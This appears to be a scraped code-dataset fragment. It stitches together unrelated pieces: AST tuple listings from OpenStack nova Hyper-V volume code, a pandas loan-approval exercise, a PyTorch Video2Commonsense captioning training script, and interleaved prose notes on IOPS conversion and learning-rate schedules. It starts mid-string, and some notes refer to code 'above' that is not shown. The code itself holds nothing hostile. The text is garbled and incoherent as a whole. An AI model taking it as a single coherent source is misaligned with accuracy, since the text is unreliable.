Supported qos specs: %(supported_qos_specs)s'\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((87, 26, 89, 34), 'nova.exception.VolumeAttachFailed', 'exception.VolumeAttachFailed', (), '', False, 'from nova import exception\n'), ((100, 20, 100, 72), 'time.sleep', 'time.sleep', ({(100, 31, 100, 71): 'CONF.hyperv.volume_attach_retry_interval'}, {}), '(CONF.hyperv.volume_attach_retry_interval)', False, 'import time\n'), ((80, 24, 81, 62), 'nova.i18n._LE', '_LE', ({(80, 28, 81, 61): '"""Failed to attach volume %(connection_info)s to instance %(instance_name)s. """'}, {}), "('Failed to attach volume %(connection_info)s to instance %(instance_name)s. '\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((92, 24, 94, 58), 'nova.i18n._LW', '_LW', ({(92, 28, 94, 57): '"""Failed to attach volume %(connection_info)s to instance %(instance_name)s. Tries left: %(tries_left)s."""'}, {}), "('Failed to attach volume %(connection_info)s to instance %(instance_name)s. Tries left: %(tries_left)s.'\n )", False, 'from nova.i18n import _, _LE, _LI, _LW\n'), ((82, 44, 83, 45), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(83, 29, 83, 44): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n'), ((95, 44, 96, 45), 'oslo_utils.strutils.mask_dict_password', 'strutils.mask_dict_password', ({(96, 29, 96, 44): 'connection_info'}, {}), '(connection_info)', False, 'from oslo_utils import strutils\n')]
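bytes_per_sec_to_iops above turns a byte-rate QoS spec into Hyper-V's normalized IOPS, which the code comments say are allocated in 8 KB increments. A standalone sketch of that ceiling division, assuming constants.IOPS_BASE_SIZE is 8 * 1024:

IOPS_BASE_SIZE = 8 * 1024  # assumed value of constants.IOPS_BASE_SIZE

def bytes_per_sec_to_iops(no_bytes):
    # Ceiling division: a partial 8 KB chunk still costs one normalized IOP.
    return (no_bytes + IOPS_BASE_SIZE - 1) // IOPS_BASE_SIZE

print(bytes_per_sec_to_iops(0))      # 0
print(bytes_per_sec_to_iops(8192))   # 1
print(bytes_per_sec_to_iops(8193))   # 2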
lakshit-sharma/greyatom-python-for-data-science
-Loan-Approval-Analysis/code.py
55a6e5a4c54a4f7135cc09fb287d2f2fa1d36413
# --------------
# Importing header files
import numpy as np
import pandas as pd
from scipy.stats import mode

# code starts here
bank = pd.read_csv(path)

categorical_var = bank.select_dtypes(include = 'object')
print(categorical_var)

numerical_var = bank.select_dtypes(include = 'number')
print(numerical_var)

banks = bank.drop(columns=['Loan_ID'])
bank_mode = banks.mode()
banks = banks.fillna(bank_mode.iloc[0])
print(banks.isnull().sum())

avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean')
print(avg_loan_amount)

loan_approved_se = banks[ (banks['Self_Employed'] == "Yes") & (banks['Loan_Status'] == "Y") ]
loan_approved_nse = banks[ (banks['Self_Employed'] == "No") & (banks['Loan_Status'] == "Y") ]

percentage_se = (len(loan_approved_se) / 614) * 100
percentage_nse = (len(loan_approved_nse) / 614) * 100

# loan amount term
loan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 )
big_loan_term=len(loan_term[loan_term>=25])
print(big_loan_term)

columns_to_show = ['ApplicantIncome', 'Credit_History']
loan_groupby=banks.groupby(['Loan_Status'])[columns_to_show]

# Check the mean value
mean_values=loan_groupby.agg([np.mean])
print(mean_values)

# code ends here
[((11, 7, 11, 24), 'pandas.read_csv', 'pd.read_csv', ({(11, 19, 11, 23): 'path'}, {}), '(path)', True, 'import pandas as pd\n'), ((23, 18, 23, 124), 'pandas.pivot_table', 'pd.pivot_table', (), '', True, 'import pandas as pd\n')]
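A small note on the analysis above: the approval percentages divide by the hard-coded row count 614. Assuming banks, loan_approved_se and loan_approved_nse are built exactly as in the script, the same figures can be computed without the magic number:

percentage_se = (len(loan_approved_se) / len(banks)) * 100
percentage_nse = (len(loan_approved_nse) / len(banks)) * 100
print(round(percentage_se, 2), round(percentage_nse, 2))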
jacobswan1/Video2Commonsense
others/train_RNN.py
4dcef76360a29702fd90b7030a39a123da6db19e
''' Training Scropt for V2C captioning task. ''' __author__ = 'Jacob Zhiyuan Fang' import os import numpy as np from opts import * from utils.utils import * import torch.optim as optim from model.Model import Model from torch.utils.data import DataLoader from utils.dataloader import VideoDataset from model.transformer.Optim import ScheduledOptim def train(loader, model, optimizer, opt, cap_vocab, cms_vocab): model.train() for epoch in range(opt['epochs']): iteration = 0 for data in loader: torch.cuda.synchronize() if opt['cms'] == 'int': cms_labels = data['int_labels'] elif opt['cms'] == 'eff': cms_labels = data['eff_labels'] else: cms_labels = data['att_labels'] if opt['cuda']: fc_feats = data['fc_feats'].cuda() cap_labels = data['cap_labels'].cuda() cms_labels = cms_labels.cuda() optimizer.zero_grad() # cap_probs, cms_probs = model(fc_feats, cap_labels, cap_pos, cms_labels, cms_pos) cap_probs, _, cms_probs, _ = model(fc_feats, cap_labels, cms_labels) # note: currently we just used most naive cross-entropy as training objective, # advanced loss func. like SELF-CRIT, different loss weights or stronger video feature # may lead performance boost, however is not the goal of this work. cap_loss, cap_n_correct = cal_performance(cap_probs.view(-1, cap_probs.shape[-1]), cap_labels[:, 1:], smoothing=True) cms_loss, cms_n_correct = cal_performance(cms_probs.view(-1, cms_probs.shape[-1]), cms_labels[:, 1:], smoothing=True) # compute the token prediction Acc. non_pad_mask = cap_labels[:, 1:].ne(Constants.PAD) n_word = non_pad_mask.sum().item() cms_non_pad_mask = cms_labels[:, 1:].ne(Constants.PAD) cms_n_word = cms_non_pad_mask.sum().item() cap_loss /= n_word cms_loss /= n_word loss = cms_loss + cap_loss loss.backward() optimizer.step_and_update_lr() torch.nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), 1) # update parameters cap_train_loss = cap_loss.item() cms_train_loss = cms_loss.item() # multi-gpu case, not necessary in newer PyTorch version or on single GPU. 
if opt['cuda']: torch.cuda.synchronize() iteration += 1 if iteration % opt['print_loss_every'] ==0: print('iter %d (epoch %d), cap_train_loss = %.6f, cms_train_loss = %.6f,' ' current step = %d, current lr = %.3E, cap_acc = %.3f, cms_acc = %.3f' % (iteration, epoch, cap_train_loss, cms_train_loss, optimizer.n_current_steps, optimizer._optimizer.param_groups[0]['lr'], cap_n_correct/n_word, cms_n_correct/cms_n_word)) # show the intermediate generations if opt['show_predict']: cap_pr, cap_gt = show_prediction(cap_probs, cap_labels[:, :-1], cap_vocab, caption=True) cms_pr, cms_gt = show_prediction(cms_probs, cms_labels[:, :-1], cms_vocab, caption=False) print(' \n') with open(opt['info_path'], 'a') as f: f.write('model_%d, cap_loss: %.6f, cms_loss: %.6f\n' % (epoch, cap_train_loss, cms_train_loss)) f.write('\n %s \n %s' % (cap_pr, cap_gt)) f.write('\n %s \n %s' % (cms_pr, cms_gt)) f.write('\n') if epoch % opt['save_checkpoint_every'] == 0: # save the checkpoint model_path = os.path.join(opt['output_dir'], 'CMS_CAP_MODEL_{}_lr_{}_BS_{}_Layer_{}_ATTHEAD_{}_HID_{}_RNNLayer_{}_epoch_{}.pth' .format(opt['cms'], opt['init_lr'], opt['batch_size'], opt['num_layer'], opt['num_head'], opt['dim_model'], opt['rnn_layer'], epoch)) torch.save(model.state_dict(), model_path) print('model saved to %s' % model_path) with open(opt['model_info_path'], 'a') as f: f.write('model_%d, cap_loss: %.6f, cms_loss: %.6f\n' % (epoch, cap_train_loss/n_word, cms_train_loss/n_word)) def main(opt): # load and define dataloader dataset = VideoDataset(opt, 'train') dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=True) opt['cms_vocab_size'] = dataset.get_cms_vocab_size() opt['cap_vocab_size'] = dataset.get_cap_vocab_size() if opt['cms'] == 'int': cms_text_length = opt['int_max_len'] elif opt['cms'] == 'eff': cms_text_length = opt['eff_max_len'] else: cms_text_length = opt['att_max_len'] # model initialization. from model.S2VTModel import S2VTModel model = S2VTModel( dataset.get_cap_vocab_size(), dataset.get_cms_vocab_size(), opt['cap_max_len'], cms_text_length, opt["dim_model"], opt["dim_word"], opt['dim_vis_feat'], n_layers=opt['rnn_layer']) # number of parameters model_parameters = filter(lambda p: p.requires_grad, model.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) print('number of learnable parameters are {}'.format(params)) if opt['cuda']: model = model.cuda() # resume from previous checkpoint if indicated if opt['load_checkpoint'] and opt['resume']: cap_state_dict = torch.load(opt['load_checkpoint']) model_dict = model.state_dict() model_dict.update(cap_state_dict) model.load_state_dict(model_dict) optimizer = ScheduledOptim(optim.Adam(filter(lambda x: x.requires_grad, model.parameters()), betas=(0.9, 0.98), eps=1e-09), 512, opt['warm_up_steps']) # note: though we set the init learning rate as np.power(d_model, -0.5), # grid search indicates different LR may improve the results. 
opt['init_lr'] = round(optimizer.init_lr, 3) # create checkpoint output directory dir = os.path.join(opt['checkpoint_path'], 'S2VT_CMS_CAP_MODEL_{}_lr_{}_BS_{}_Layer_{}_ATTHEAD_{}_HID_{}_RNNLayer_{}' .format(opt['cms'], opt['init_lr'], opt['batch_size'], opt['num_layer'], opt['num_head'], opt['dim_model'], opt['rnn_layer'])) if not os.path.exists(dir): os.makedirs(dir) # save the model snapshot to local info_path = os.path.join(dir, 'iteration_info_log.log') print('model architecture saved to {} \n {}'.format(info_path, str(model))) with open(info_path, 'a') as f: f.write(str(model)) f.write('\n') f.write(str(params)) f.write('\n') # log file directory opt['output_dir'] = dir opt['info_path'] = info_path opt['model_info_path'] = os.path.join(opt['output_dir'], 'checkpoint_loss_log.log') train(dataloader, model, optimizer, opt, dataset.get_cap_vocab(), dataset.get_cms_vocab()) if __name__ == '__main__': opt = parse_opt() opt = vars(opt) main(opt)
[((113, 14, 113, 40), 'utils.dataloader.VideoDataset', 'VideoDataset', ({(113, 27, 113, 30): 'opt', (113, 32, 113, 39): '"""train"""'}, {}), "(opt, 'train')", False, 'from utils.dataloader import VideoDataset\n'), ((114, 17, 114, 80), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((167, 16, 167, 59), 'os.path.join', 'os.path.join', ({(167, 29, 167, 32): 'dir', (167, 34, 167, 58): '"""iteration_info_log.log"""'}, {}), "(dir, 'iteration_info_log.log')", False, 'import os\n'), ((178, 29, 178, 87), 'os.path.join', 'os.path.join', ({(178, 42, 178, 59): "opt['output_dir']", (178, 61, 178, 86): '"""checkpoint_loss_log.log"""'}, {}), "(opt['output_dir'], 'checkpoint_loss_log.log')", False, 'import os\n'), ((164, 11, 164, 30), 'os.path.exists', 'os.path.exists', ({(164, 26, 164, 29): 'dir'}, {}), '(dir)', False, 'import os\n'), ((164, 32, 164, 48), 'os.makedirs', 'os.makedirs', ({(164, 44, 164, 47): 'dir'}, {}), '(dir)', False, 'import os\n')]
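ScheduledOptim above is constructed with d_model = 512 and opt['warm_up_steps'], and the comment notes the initial learning rate scales as d_model ** -0.5. The class itself is not shown here, so as an assumption it follows the standard Transformer "Noam" warm-up schedule; a sketch of that formula with an assumed warm-up of 2000 steps:

def noam_lr(step, d_model=512, warmup=2000):
    # Learning rate grows roughly linearly for `warmup` steps, then decays as step ** -0.5.
    return d_model ** -0.5 * min(step ** -0.5, step * warmup ** -1.5)

for s in (1, 500, 2000, 10000):
    print(s, noam_lr(s))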